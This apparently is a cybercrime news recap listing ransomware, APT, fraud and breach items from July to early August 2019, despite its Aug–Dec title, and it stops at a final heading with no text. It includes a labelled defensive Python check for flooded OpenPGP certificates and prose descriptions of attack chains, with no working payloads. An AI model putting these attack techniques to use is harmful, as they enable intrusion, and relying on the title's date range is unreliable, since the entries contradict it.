CyberCrime - 6 month Recap Aug-Dec 2019
Cybercriminal Poisons OpenPGP Certificates (07/02/2019)
In late June, unknown actors deployed a certificate spamming attack against two high-profile contributors in the OpenPGP community (Robert J. Hansen and Daniel Kahn Gillmor, known in the community as "rjh" and "dkg"). This attack exploited a defect in the OpenPGP protocol in order to "poison" rjh and dkg's OpenPGP certificates. Anyone who attempts to import a poisoned certificate into a vulnerable OpenPGP installation will very likely break their installation, researchers Hansen and Gillmor have warned. Poisoned certificates have since been found on the SKS keyserver network.
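The entry above does not describe the defect itself; the attack it refers to is commonly called "certificate flooding": an OpenPGP certificate can carry an unbounded number of third-party certification signatures, and importing one that has been padded with tens of thousands of them overwhelms affected installations. A defender-side check, added here as an example rather than code from the article, GnuPG or the SKS project, is to parse the RFC 4880 packet structure of a binary certificate and count signature packets before handing it to the keyring. The packet-header parser below follows RFC 4880 (old and new header formats); the threshold `MAX_SIGNATURES`, the helper names and the toy certificates built by `build_certificate` are assumptions constructed for this example, not real keys.

```python
"""Count OpenPGP packets in a binary certificate before importing it.

Added example (not code from the original article or from GnuPG/SKS).
Assumptions: the certificate is binary (not ASCII-armored); a certificate
whose signature-packet count exceeds MAX_SIGNATURES is treated as
suspicious. The sample certificates are constructed inline with dummy
packet bodies and are not real keys.
"""
from collections import Counter

# RFC 4880 packet tags
TAG_SIGNATURE = 2
TAG_PUBLIC_KEY = 6
TAG_USER_ID = 13
TAG_PUBLIC_SUBKEY = 14

MAX_SIGNATURES = 1000  # assumed threshold; tune to your own environment


def read_packet_header(data: bytes, pos: int):
    """Parse one RFC 4880 packet header at `pos`.

    Returns (tag, body_start, body_len)."""
    first = data[pos]
    if not first & 0x80:
        raise ValueError(f"invalid packet header at offset {pos}")
    if first & 0x40:  # new-format header (RFC 4880 section 4.2.2)
        tag = first & 0x3F
        b0 = data[pos + 1]
        if b0 < 192:                      # one-octet length
            return tag, pos + 2, b0
        if b0 < 224:                      # two-octet length
            return tag, pos + 3, ((b0 - 192) << 8) + data[pos + 2] + 192
        if b0 == 255:                     # five-octet length
            return tag, pos + 6, int.from_bytes(data[pos + 2:pos + 6], "big")
        raise ValueError("partial body lengths not supported in this check")
    # old-format header (RFC 4880 section 4.2.1)
    tag = (first >> 2) & 0x0F
    length_type = first & 0x03
    if length_type == 3:
        raise ValueError("indeterminate-length packet not supported")
    n = 1 << length_type  # 1, 2 or 4 length octets
    return tag, pos + 1 + n, int.from_bytes(data[pos + 1:pos + 1 + n], "big")


def count_packets(cert: bytes) -> Counter:
    """Walk the packet sequence and tally packets per tag."""
    counts = Counter()
    pos = 0
    while pos < len(cert):
        tag, body_start, body_len = read_packet_header(cert, pos)
        if body_start + body_len > len(cert):
            raise ValueError(f"truncated packet at offset {pos}")
        counts[tag] += 1
        pos = body_start + body_len
    return counts


def is_poisoned(cert: bytes, max_signatures: int = MAX_SIGNATURES) -> bool:
    """True when the certificate carries more signatures than we tolerate."""
    return count_packets(cert)[TAG_SIGNATURE] > max_signatures


def _packet(tag: int, body: bytes) -> bytes:
    """Build a new-format packet (constructed test data only)."""
    n = len(body)
    if n < 192:
        length = bytes([n])
    elif n < 8384:
        n -= 192
        length = bytes([(n >> 8) + 192, n & 0xFF])
    else:
        length = b"\xff" + n.to_bytes(4, "big")
    return bytes([0xC0 | tag]) + length + body


def build_certificate(extra_signatures: int) -> bytes:
    """Construct a toy certificate: key, user ID, self-signature, subkey,
    binding signature, plus `extra_signatures` third-party certifications.
    Packet bodies are dummy bytes; only the packet framing is realistic."""
    cert = (_packet(TAG_PUBLIC_KEY, b"\x04" + b"\x00" * 40)
            + _packet(TAG_USER_ID, b"Example User <user@example.org>")
            + _packet(TAG_SIGNATURE, b"\x04\x13" + b"\x00" * 30)
            + _packet(TAG_PUBLIC_SUBKEY, b"\x04" + b"\x00" * 40)
            + _packet(TAG_SIGNATURE, b"\x04\x18" + b"\x00" * 30))
    cert += _packet(TAG_SIGNATURE, b"\x04\x10" + b"\x00" * 30) * extra_signatures
    return cert


if __name__ == "__main__":
    for name, cert in (("normal", build_certificate(5)),
                       ("flooded", build_certificate(5000))):
        c = count_packets(cert)
        print(f"{name}: {c[TAG_SIGNATURE]} signature packets, "
              f"{len(cert)} bytes, poisoned={is_poisoned(cert)}")
```

The check is deliberately structural: it never validates signatures, so it runs in linear time over the certificate and can gate a keyserver fetch before any cryptographic processing. Armored input would first need to be de-armored, and certificates using partial body lengths are rejected rather than guessed at.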
Global Organizations Targeted by Ryuk Ransomware (07/02/2019)
The UK's National Cyber Security Center (NCSC) published an advisory to promote information regarding current Ryuk ransomware campaigns targeting organizations globally. In some cases, Emotet and Trickbot infections have also been identified on networks targeted by Ryuk. The ransomware often stays hidden for a period of time after the initial infection - ranging from days to months - which allows the actor time to carry out reconnaissance inside an infected network, identifying and targeting critical network systems and maximizing the impact of the attack.
Operation Tripoli Compromised Sites Using Fake Facebook Pages to Take Aim at Libya (07/02/2019)
Check Point Software spotted a large-scale campaign that for years was using Facebook pages to spread malware across mobile and desktop environments and specifically targeted Libya. The investigation began when the researchers came across a Facebook page impersonating the commander of Libya's National Army, Khalifa Haftar. The research found that the attacker had been manipulating Facebook for years, compromising legitimate Web sites to host malware, and successfully hitting tens of thousands of victims mainly from Libya, but also in Europe, the United States, and Canada. The campaign has been dubbed "Operation Tripoli."
Ratsnif Trojans in Heavy Use by OceanLotus Threat Actor (07/02/2019)
According to analysis from BlackBerry Cylance, the OceanLotus group is using a suite of remote access Trojans dubbed "Ratsnif" to leverage new network attack capabilities. The researchers have analyzed the Ratsnif Trojans, which have been under active development since 2016 and combine capabilities like packet sniffing, gateway/device Address Resolution Protocol poisoning, DNS poisoning, HTTP injection, and Media Access Control spoofing. Upon execution, Ratsnif creates a run once mutex named "onceinstance", initializes Winsock version 2.2, and harvests system information to send to its attacker's command and control server.
Sony Online Entertainment Hacker Receives Jail Sentence (07/09/2019)
Austin Thompson of Utah was sentenced to 27 months in prison for carrying out a series of denial-of-service attacks against multiple victims between 2013 and 2014, the Justice Department (DOJ) announced. Thompson was also ordered to pay $95,000 USD in restitution to Daybreak Games, formerly Sony Online Entertainment. The attacks took down game servers and related computers around the world, often for hours at a time.
TA505 Threat Entity Implements AndroMut (FlawedAmmyy) Malware in Campaigns (07/02/2019)
The TA505 threat actor introduced a new downloader malware, AndroMut (also known as FlawedAmmyy), which has some similarities in code and behavior to Andromeda, a long-established malware family. Proofpoint researchers observed two distinct campaigns by TA505 that used AndroMut to download the FlawedAmmyy remote access Trojan. The first campaign targeted recipients in South Korea while the second took aim at recipients at financial institutions in Singapore, the UAE, and the US.
UK Fines British Airways, Marriott in Wake of Breaches (07/09/2019)
The UK's Information Commissioner's Office (ICO) intends to fine British Airways £183.39 million ($230 million USD) for infringements of the General Data Protection Regulation. The proposed fine relates to a cyber incident in September 2018. This incident in part involved user traffic to the British Airways Web site being diverted to a fraudulent site. Through this false site, customer details were harvested by the attackers and the personal data of approximately 500,000 customers was compromised. It is believed that the breach began in June 2018. The ICO's investigation has found that a variety of information was compromised by poor security arrangements at the company, including login, payment card, and travel booking details, names, and addresses. In addition, the ICO will hand down a £99.2 million ($123 million) fine to the Marriott Starwood hotel chain for a breach in which 383 million guest records were compromised. The ICO said, "It is believed the vulnerability began when the systems of the Starwood hotels group were compromised in 2014. Marriott subsequently acquired Starwood in 2016, but the exposure of customer information was not discovered until 2018. The ICO's investigation found that Marriott failed to undertake sufficient due diligence when it bought Starwood and should also have done more to secure its systems."
Attackers Probe Election-Related Organizations (07/18/2019)
Microsoft announced that its AccountGuard cyber threat detection service, which launched in August 2018, has identified 781 nation-state attacks taking aim at organizations using the service. Ninety-five percent of these attacks have targeted US-based organizations. Many of the attacks were aimed at think tanks and non-governmental organizations that work closely with political parties and election candidates. Microsoft did not elaborate on whether any of the attacks were successful.
Dutch National Arrested for Producing, Distributing Rubella Malware (07/17/2019)
The Dutch National Police Unit arrested a Dutch resident suspected of the large-scale production and selling of malware, including Rubella, Cetan and Dryad. The suspect was active in hackers' forums under various names and eventually was tracked down. He is alleged to have created and sold the Rubella Macro Builder toolkit, which is used to weaponize Office documents to deliver malicious payloads. McAfee spotted Rubella in the wild and aided in this investigation.
GandCrab Might Be Gone but Its Operators Are Back with REvil Ransomware (07/16/2019)
While the operators of the GandCrab ransomware announced they were shuttering their malicious business in June, security researcher Brian Krebs suspects that the threat actors behind it may have reemerged with a new ransomware. KrebsOnSecurity reported that the GandCrab team is most likely behind a program called REvil (also known as Sodin and Sodinokibi). Cisco identified Sodinokibi, which was used to deploy GandCrab while a Dutch firm noticed similarities in how GandCrab and REvil generate URLs within the infection process. Krebs said in a blog post, "My guess is the GandCrab team has not retired, and has simply regrouped and re-branded due to the significant amount of attention from security researchers and law enforcement investigators. It seems highly unlikely that such a successful group of cybercriminals would just walk away from such an insanely profitable enterprise."
Malicious Framework Banks Cash Via Ad Fraud (07/18/2019)
A malware framework is responsible for more than one billion fraudulent ad impressions since April, generating its operators significant Google AdSense revenue on a monthly basis. Flashpoint researchers uncovered the framework, which features three separate stages that ultimately install a malicious browser extension designed to perform fraudulent AdSense impressions, as well as generate likes on YouTube videos and watch hidden Twitch streams. The framework is designed to pad statistics on social sites and ad impressions, creating revenue for its operators who are using a botnet to attack the content and advertising platforms by spreading the malware and targeting browsers including Google Chrome, Mozilla Firefox, and Yandex's browser.
StrongPity Adversary Deploys Newly Configured Malware Tools (07/17/2019)
AlienVault has identified an ongoing malware campaign, attributable to the StrongPity (also known as PROMETHIUM) adversary, that began in the second half of 2018. The malware samples appear to have been created and deployed to targets following a toolset rebuild in response to various security vendors reporting on StrongPity's tactics in 2018. One sample is a malicious installer for WinBox, a utility that allows administration of the Mikrotik Router operating system using a simple GUI. Other installers are also being used, including newer versions of WinRAR and a tool called Internet Download Manager which maliciously installs StrongPity and communicates with related adversary infrastructure.
SWEED Threat Actor Uses Agent Tesla to Victimize Manufacturing, Logistics Companies (07/17/2019)
A threat actor dubbed "SWEED" by Cisco's Talos researchers is pushing multiple campaigns that use Formbook, Lokibot, and Agent Tesla malware. SWEED has been in operation since at least 2017 and primarily targets victims with stealers and remote access Trojans. The threat actor has used various techniques to infiltrate its victims, but beginning in 2019, SWEED began leveraging malicious Office macros and using different methods to bypass User Account Control on systems. It is targeting small and medium-sized companies in manufacturing and logistics around the world.
UK Warns that DNS Hijacking Campaigns Continue (07/16/2019)
An advisory issued by the UK's National Cyber Security Center highlights Domain Name System hijacking activity and offers remediation methods. According to the advisory, multiple regions and sectors have been victimized by these incidents.
APT34/OilRig Impersonates Cambridge U to Lure Victims in Malware-Laced Campaign (07/22/2019)
FireEye identified a phishing campaign conducted by APT34, an Iranian threat actor posing as a member of Cambridge University to gain victims' trust to open malicious documents. The campaign used LinkedIn to deliver the malicious documents and organizations in energy/utilities, government, and oil/gas were the targets. APT34 (also known as OilRig and Greenbug) uses a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. FireEye also identified a variant of the Pickpocket browser credential-stealing tool and two new malware families, VALUEVAULT and LONGWATCH, in use by this campaign.
Attackers Actively Exploiting Bug in Campus Platform; 62 Colleges Already Breached (07/24/2019)
The Department of Education issued an advisory regarding the active and ongoing exploitation of a previously identified vulnerability in the Ellucian Banner system. Attackers can leverage the bug against the Banner system using an institutional account. The department has identified 62 colleges or universities that have been affected by exploitation of this vulnerability. Additionally, there is information "that indicates criminal elements have been actively scanning the Internet looking for institutions to victimize through this vulnerability and developing lists of institutions for targeting with this exploitation." Banner is an administrative software system designed for higher education institutions. Security researcher Joshua Mulliken detailed the bug in a December 2018 advisory.
Bugs in WordPress Abused to Push Out Malicious Ad Campaign (07/24/2019)
Researchers at Wordfence warn of a malvertising campaign which is causing victims' sites to display unwanted popup ads and redirect visitors to malicious destinations, including tech support scams, malicious Android APKs, and sketchy pharmaceutical ads. By exploiting WordPress vulnerabilities, the attackers inject a JavaScript payload into the front end of a victim's site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim Web site. When the third party code executes in a visitor's browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user.
Cyber Attacks Cause State of Emergency Declaration in Louisiana (07/24/2019)
Louisiana's governor declared a state of emergency on July 24 due to an ongoing cyber attack that has affected several school districts in the northern part of the state. The Governor's Office of Homeland Security and Emergency Preparedness activated its crisis action team and also the Emergency Services Function-17 to coordinate the response to this cybersecurity incident, which included the FBI and state agencies. Governor John Bel Edwards said, "The state was made aware of a malware attack on a few north Louisiana school systems and we have been coordinating a response ever since."
Facebook Slammed with $5 Billion Penalty for Violating Consumers' Privacy (07/24/2019)
The Federal Trade Commission (FTC) has imposed a $5 billion USD fine and new restrictions on Facebook as punishment for violating consumers' privacy. The settlement order imposes restrictions on Facebook's business operations, creates multiple channels of compliance, and requires Facebook to restructure its approach to privacy. The social media giant must establish strong mechanisms to ensure that Facebook executives are accountable for the decisions they make about privacy, and that those decisions are subject to meaningful oversight. To encourage users to share information on its platform, Facebook promises users they can control the privacy of their information through the platform's privacy settings. Following a year-long investigation, the FTC found that Facebook repeatedly used deceptive practices to undermine users' privacy preferences. These tactics allowed the company to share users' personal information with third-party apps that were downloaded by the user's Facebook "friends." The FTC alleges that many users were unaware that Facebook was sharing such information, and therefore did not take the steps needed to opt-out of sharing. "Despite repeated promises to its billions of users worldwide that they could control how their personal information is shared, Facebook undermined consumers' choices," said FTC Chairman Joe Simons. "The magnitude of the $5 billion penalty and sweeping conduct relief are unprecedented in the history of the FTC. The relief is designed not only to punish future violations but, more importantly, to change Facebook's entire privacy culture to decrease the likelihood of continued violations." The $5 billion penalty is the largest ever imposed on any company for violating consumers' privacy.
Former Government Contractor Gets Jail Time for Stealing Classified Data (07/22/2019)
Former National Security Agency (NSA) contractor Harold Martin has been sentenced to nine years in prison for stealing highly classified national defense information for almost 20 years, the Justice Department (DOJ) announced. Beginning in the late 1990s and continuing through August 2016, Martin stole and retained government property from secure locations and computer systems, including documents in both hard copy and digital form relating to national defense.
FTC Sues Cambridge Analytica for Deceptive Privacy Practices (07/24/2019)
The Federal Trade Commission (FTC) filed an administrative complaint against data analytics company Cambridge Analytica, and filed settlements for public comment with Cambridge Analytica's former chief executive and an app developer who worked with the company, alleging they employed deceptive tactics to harvest personal information from tens of millions of Facebook users for voter profiling and targeting. The FTC alleges that Cambridge Analytica and two defendants, app developer Aleksandr Kogan and former Cambridge Analytica CEO Alexander Nix, deceived consumers by falsely claiming they did not collect any personally identifiable information from Facebook users who were asked to answer survey questions and share some of their Facebook profile data. Kogan is the developer of the GSRApp that was utilized by Facebook users to answer personality-type questions. Kogan, Nix, and Cambridge Analytica used and analyzed the data collected from the app to train an algorithm to generate personality scores for the app users and their Facebook friends. Those personality scores were then matched to US voter records and used by Cambridge Analytica for voter profiling and targeted advertising services. GSRApp told users it would not download any identifiable information - only demographic data - but the FTC has said that those claims were false and the app collected Facebook User IDs, which connects individuals to their Facebook profiles, as well as other personal information such as their gender, birthdate, location, and their Facebook friends list.
Legitimate WeTransfer Links Exploited to Drop Malware-Laced URLs (07/24/2019)
Cofense has observed a wave of phishing attacks that utilize the legitimate file hosting site WeTransfer to deliver malicious URLs to bypass email gateways. The attacks span major industries like banking, power, and media. The attackers are using what appears to be compromised email accounts to send a genuine link to a WeTransfer hosted file. As these are legitimate links from WeTransfer, this allows them to travel straight through security checks at the gateway.
Massive DDoS Attack Lasts Nearly Two Weeks, Used Mirai-Infected Devices (07/25/2019)
Imperva mitigated a massive distributed denial-of-service attack that peaked at 292,000 packets per second and used 402,000 compromised devices. The attack, sourced back to Brazil, lasted 13 days and hit an Imperva client in the entertainment industry. The attackers used a legitimate User-Agent, the same as used by the entertainment industry customer service application, to mask the attack which targeted the authentication component of the client's streaming application. Upon analysis, the devices used in the attack all had the same open ports which showed their association with the Mirai malware.
Multi-Stage Attack Chain Turns Elasticsearch Servers into DDoS Botnet Zombies (07/24/2019)
Elasticsearch is being abused by turning affected targets into botnet zombies used in distributed denial-of-service (DDoS) attacks. The attack chain involves searching for exposed or publicly accessible Elasticsearch databases/servers. The malware would invoke a shell with an attacker-crafted search query with encoded Java commands. Once this is successfully carried out, the first malicious script is downloaded from a domain, which, in Trend Micro's analysis, appears to be expendable or easy-to-replace. The first-stage script will attempt to shut down the firewall as well as competing and already-running cryptocurrency mining activities and other processes. The second-stage script is then retrieved, likely from a compromised Web site. Using expendable domains allows the attackers to swap URLs as soon as they are detected.
Operation LagTime IT Threat Campaign Takes Aim at Asian Infrastructure (07/24/2019)
Proofpoint researchers identified a targeted advanced persistent threat (APT) campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. The campaign, dubbed "Operation LagTime IT," uses spear phishing as its attack vector and a Microsoft Equation Editor zero-day bug to deliver a custom malware called Cotx RAT. Additionally, this APT group implements Poison Ivy payloads that share overlapping command and control infrastructure with the Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic tools used in this operation, Proofpoint analysts attribute this activity to the Chinese APT group known as TA428. The group has targeted government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes.
QuickBooks Cloud Host Falls Victim to Ransomware Attack (07/22/2019)
KrebsOnSecurity reported that iNSYNQ, a cloud hosting provider, was hit by a ransomware attack that left its network inaccessible and customers unable to reach their data. iNSYNQ specializes in delivering cloud-based QuickBooks accounting software and services. In a statement, the company said, "The attack impacted data belonging to certain iNSYNQ clients, rendering such data inaccessible. As soon as iNSYNQ discovered the attack, iNSYNQ took steps to contain it. This included turning off some servers in the iNSYNQ environment." CEO Elliot Luchansky said in a separate statement on July 22, "iNSYNQ and our customers were the victims of a malware attack that's a totally new variant that hadn't been detected before, confirmed by the experienced and knowledgeable cybersecurity team we've employed."
Symantec Examines BEC Scam Statistics (07/24/2019)
According to Symantec telemetry, the average daily volume of business email compromise (BEC) messages was significantly higher in the first quarter of 2019 than in the same period one year ago. From January to March 2018, the average daily BEC email volume was 85,816, while from January to March 2019, the average daily volume was 128,700, a 50% increase. The top five nations targeted by BEC scammers between mid-2018 and mid-2019 were as follows: the US (39%), the UK (26%), Australia (11%), Belgium (3%), and Germany (3%).
Three Romanians Receive Jail Time for Hacking Schemes (07/24/2019)
Three Romanian citizens - Teodor Laurentiu Costea, Robert Codrut Dumitrescu, and Cosmin Draghici - have been sentenced to federal prison on wire fraud conspiracy, computer fraud and abuse, and aggravated identity theft charges, the Justice Department (DOJ) announced. The "vishing" and "smishing" schemes resulted in the illegal intrusion into computer servers in the US. The men also deployed phishing messages to thousands of victims and subsequently stole victims' Social Security numbers and bank account information. Losses totaled over $21 million USD. Vishing is a type of phishing scheme that communicates a phishing message, or a message that purports to be from a legitimate source, in this case the victims' banks, through a voice recording. Smishing is similar but communicates a phishing message through text messages.
Attacks Use Brute Force and Ransomware to Target NAS Devices (07/30/2019)
While investigating several ransomware incidents, Synology determined that the causes of these attacks were due to dictionary attacks instead of specific system vulnerabilities. This large-scale attack was targeted at various NAS (network attached storage) models from different vendors, including Synology. In each incident, admins' credentials were stolen by brute-force login attacks, and their data was encrypted. Synology's team strongly recommends users check network and account settings to protect data.
BEC Scam Siphons $1.7 Million from NC's Cabarrus County (08/01/2019)
A North Carolina county paid more than $2.5 million USD to a scammer after falling victim to a business email compromise (BEC) scheme that began in November 2018. Cabarrus County officials released details of the scam that diverted a $2,504,601 vendor payment made by the county. Officials have retrieved some of the funds, but more than $1.7 million remains missing. Conspirators posed as representatives of the contracting firm that was to construct a new high school and targeted employees working for the county government by using BEC tactics.
Cisco to Pay $8.6 M for Knowingly Selling Flawed Software to US Government (08/01/2019)
Cisco agreed to settle a case for $8.6 million USD after a whistleblower accused the company of knowingly selling flawed video surveillance software to the US government and other customers, ZDNet reported. The case was handled under the False Claims Act and the suit was filed in May 2011 but was not made public until July 31. James Glenn, a Cisco subcontractor who worked at NetDesign in Denmark, said he discovered security holes in the vendor's Video Surveillance Manager (VSM) and notified Cisco in October 2008. The flaws could have enabled attackers to take control of video surveillance cameras and potentially gain access to networks. Cisco did not fix the vulnerabilities and continued to sell the VSM package to customers, including the US government. When Cisco failed to act, Glenn filed a whistleblower case and 18 states joined in. Cisco patched the bugs in 2013 and retired the VSM package a year later.
Financial Institution in Kazakhstan Is Cobalt Group's New Target (08/01/2019)
The Cobalt Group cybercriminal actor has taken aim at a bank in Kazakhstan with a decoy document that Check Point Software researchers say may have been lifted from the bank's actual Web site. The malicious file was hosted among the documents repository of the bank, which makes it easy to confuse with a legitimate document. Once downloaded and launched, the fake document uses socially-engineered content to trick victims into running the embedded malicious macros.
Georgia's Public Safety Agency Victimized by Ransomware Attack (07/31/2019)
In a statement posted online, the Georgia Department of Public Safety (DPS) announced that its network servers were offline due to a ransomware attack. Government Technology reported that the incident was first observed on July 26 when certain network services and communication systems were disrupted. DPS Chief Technology Officer Steve Nichols said that once the incident was discovered, employees worked to take all servers offline. The Ryuk ransomware was responsible for the attack.
HEXANE Threat Group Targets Middle Eastern ICS Organizations (07/31/2019)
Dragos identified a new activity group targeting industrial control systems (ICS). HEXANE is targeting oil and gas companies in the Middle East, including Kuwait, as a primary operating region and telecommunication providers in the greater Middle East, Central Asia, and Africa. HEXANE intrusion activity includes malicious documents that drop malware to establish footholds for follow-on activity. The group became operational in mid-2018 but its activity has intensified since early 2019. HEXANE demonstrates similarities to the activity groups MAGNALLIUM and CHRYSENE; all are ICS-targeting activities focusing largely on oil and gas, and some of the behaviors and recently observed tactics, techniques, and procedures are similar. Dragos noted that MAGNALLIUM also has accelerated its activity and has been targeting US government and financial organizations as well as oil and gas companies.
Jail Doors Slam on Silk Road Operator (07/30/2019)
Silk Road operator Gary Davis has been sentenced to a 78 month prison term for his role as a member of the cybercriminal marketplace, the Justice Department (DOJ) announced. During its operation from 2011 until 2013, Silk Road was used by thousands of drug dealers and other unlawful vendors to distribute over $200 million USD worth of illegal drugs and other illicit goods and services to more than 115,000 buyers, and to launder hundreds of millions of dollars derived from those unlawful transactions. Davis worked as a forum moderator and a site administrator for Silk Road and also as an administrator for its next implementation, Silk Road 2.0.
Symantec: Email Extortion Schemes Alive, Well, and Thriving (07/30/2019)
Symantec announced that its technologies blocked 289 million extortion scam emails between January 1 and May 29 - 85 million (nearly 30%) of those messages were blocked in one 17-day period alone. It is not clear which threat actors are behind these scams.
"Warshipping" Delivers Attacks in Packages to Silently Torpedo Corporate Networks (08/07/2019)
A tactic dubbed "warshipping" by IBM's X-Force Red team of researchers involves the use of ecommerce-style package deliveries by attackers with the intention of hacking into corporate or home networks from the office mailroom or from someone's front door. Using warshipping, the researchers could infiltrate a network without being detected. Warshipping relies on disposable, low-cost, low-power computers to remotely perform close-proximity attacks, regardless of the attacker's location. A malicious actor can hide a tiny device (about the size of a small cellphone) in a package and ship it to the victim to gain access to a specific network. The device, a 3G-enabled, remotely controlled system no bigger than the palm of a hand, can be tucked into the bottom of a packaging box or stuffed inside an item.
Advisory Details Password Spraying Attacks Targeting Various Services (08/07/2019)
The Australian Cyber Security Center (ACSC) is aware of a high volume of ongoing password spray attacks targeting Australian organizations. The password spray attacks target users on standard corporate external services such as webmail, remote desktop access, Active Directory Federation Services, or cloud-based services such as Office 365. Depending on the credentials and service, successful authentication can potentially lead to the actor gaining access to corporate email, the corporate directory, global address books, remote desktop services, or administrative access. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ACSC advisory.
APT41 Employs Numerous Methods for Its Espionage and Cybercriminal Activities (08/06/2019)
FireEye has detailed its research into APT41, a Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain and has been conducting simultaneous cybercrime and cyber espionage operations from 2014 onward. This entity has an arsenal of over 46 different malware families and tools to accomplish its missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. In one campaign that ran for nearly a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware, including backdoors, credential stealers, keyloggers, and rootkits.
Confidence/Romance Scams Continue to Victimize Trusting Individuals (08/06/2019)
The Internet Crime Complaint Center (IC3) posted a warning regarding an increase in confidence/romance scams in which an actor deceives a victim into believing they have a trust relationship and uses that relationship to persuade the victim to send money, provide personal and financial information, purchase items of value for the actor, or even launder money. In 2018, the IC3 received complaints from more than 18,000 individuals who had been victimized by these scams and more than $362 million USD was reported stolen. That year, confidence/romance fraud was the seventh most commonly reported scam to the IC3 based on the number of complaints received, and the second costliest scam in terms of victim loss. Tips to protect against such scams are listed in the IC3 alert.
Cryptomining Campaign Impacts More than a Half Million Global Computers (08/07/2019)
Researchers at Carbon Black identified a cryptocurrency mining campaign, "Access Mining," which has been enhanced to steal system access information for possible sale on the dark Web. This campaign potentially affects over 500,000 systems worldwide, but most have been located in Asia Pacific, Russia, and Eastern Europe. Access Mining uses multi-stage malware that sends detailed system metadata to a network of hijacked Web servers, presumably for the purposes of resale on one (or many) remote access marketplaces across the dark Web.
DOJ Uncovers Major Crime Ring at AT&T Call Center (08/07/2019)
The US Department of Justice (DOJ) uncovered a strange case of fraud and "misuse" of AT&T's network centered around the unlocking of smartphones on the company's network. The crime was perpetrated by Pakistani citizen Muhammad Fahd, who bribed staff at a Bothell, Washington AT&T call center in order to have carrier-locked smartphones unlocked from the AT&T network before the company's policy would normally allow it. While this act is already considered criminal, the much more concerning aspect of the incident may be the fact that Fahd also paid AT&T staff to insert malware and "otherwise misuse" the AT&T network for his personal gain. In exchange for facilitating his criminal activity, the participating workers at the call center were bribed to the tune of $428,500 over a five-year period. The numerous charges against Fahd include wire fraud, five counts of Travel Act violations, conspiracy to violate the Computer Fraud and Abuse Act, and four counts of accessing and damaging protected computers. The DOJ claims the fraud ring unlocked "millions of devices," allowing its ringleader to abuse the early unlocking procedure to make millions of dollars in the process.
Feds: Don't Fall Victim to Tragedy-Related Scams (08/06/2019)
The Cybersecurity and Infrastructure Security Agency (CISA) advises businesses and consumers to be vigilant for possible malicious cyber activity seeking to capitalize on the tragic events in El Paso, TX and Dayton, OH. Fraudulent email campaigns are likely after the two mass shootings, as some scammers will solicit donations for charitable causes while using the opportunity to spread malware and siphon money from unsuspecting parties.
Hacktivists Abuse SMS Protocol to Mass-Text US Subscribers (08/06/2019)
Two hackers are attempting to text every mobile phone in the US using SMS gateways, a legitimate technology often utilized by businesses to mass-text users, Wired has reported. The hackers, known by their Twitter handles @j3ws3r and @0xGiraffe, wrote a script that generated every possible seven-digit number between 1111111 and 9999999 and combined each with a list of US area codes. Although many of the messages were filtered out by US carriers, some still got through to cell phone users. "I'm here to warn the masses about SMS email gateways. Please look up how to disable it on your phone or call your provider and ask," was the message spammed out by @j3ws3r.
Middle Eastern Entities Negatively Impacted by Threat Actors OilRig, MuddyWater, Hades (08/06/2019)
In the second quarter of 2019, Kaspersky researchers observed activity in the Middle East including a series of online asset leaks such as code, infrastructure, group, and apparent victim details, allegedly belonging to the known Persian-speaking threat actors OilRig and MuddyWater. Though these leaks originated from different sources, they all appeared within a few weeks of each other. A third online leak, which was said to expose information related to an entity called the "RANA institute," was published in Persian on a Web site called "Hidden Reality." Kaspersky researchers' analysis of the materials, infrastructure, and the dedicated Web site led to the conclusion that this particular leak could be connected to the threat actor Hades. Hades is the cyber threat group behind the OlympicDestroyer incident targeting the 2018 Winter Olympic Games, as well as the ExPetr worm and other disinformation campaigns. Further details about these leaks can be gleaned from Kaspersky's quarterly advanced persistent threats summary.
Phishing Campaign Drops LookBack Malware on Critical Infrastructure Companies (08/06/2019)
Between July 19 and July 25, several spear phishing emails were identified targeting three US companies in the utilities sector. The phishing emails impersonated a US-based engineering licensing board and originated from what appears to be an actor-controlled domain, nceess[.]com. This domain is believed to be an impersonation of a domain owned by the US National Council of Examiners for Engineering and Surveying. The emails contain a malicious Word attachment that uses macros to install and run malware that Proofpoint researchers have dubbed "LookBack." This malware consists of a remote access Trojan module and a proxy mechanism used for command and control communication. LookBack appears to be the work of a nation-state actor that is targeting utilities systems and critical infrastructure providers.
Rocke Cybercriminal Gang Attacks Cloud Environments (08/06/2019)
Palo Alto Networks released details about Rocke, a China-based cybercrime group engaged in cryptomining operations targeting the cloud. By analyzing NetFlow data between December 2018 and June 2019, the researchers found that 28.1% of the cloud environments surveyed had at least one fully established network connection with at least one known Rocke command and control domain. Several of those organizations maintained near-daily connections. Meanwhile, 20% of the organizations maintained hourly heartbeats consistent with Rocke tactics, techniques, and procedures. Rocke also released a new backdoor called Godlua, which could function as an agent, allowing the group's actors to perform additional scripted operations, including denial-of-service attacks, network proxying, and two shell capabilities. NetFlow is a Cisco-developed feature of routers and switches that exports metadata about IP traffic flows (addresses, ports, timing, and volume) without capturing packet contents.
Spammers Abuse Legitimate Company Sites to Send Malicious Messages (08/08/2019)
Kaspersky researchers have identified a global, emerging trend in spam and phishing delivery techniques. Cybercriminals are increasingly exploiting registration, subscription, and feedback forms on trusted company Web sites to insert spam content or phishing links into the confirmation emails those sites send. The goal of such campaigns is to have the emails originate from a legitimate, reputable source, so that they pass reputation filters and users do not dismiss them as spam.
STRONTIUM/Fancy Bear Compromises IoT Devices to Access Corporate Networks (08/06/2019)
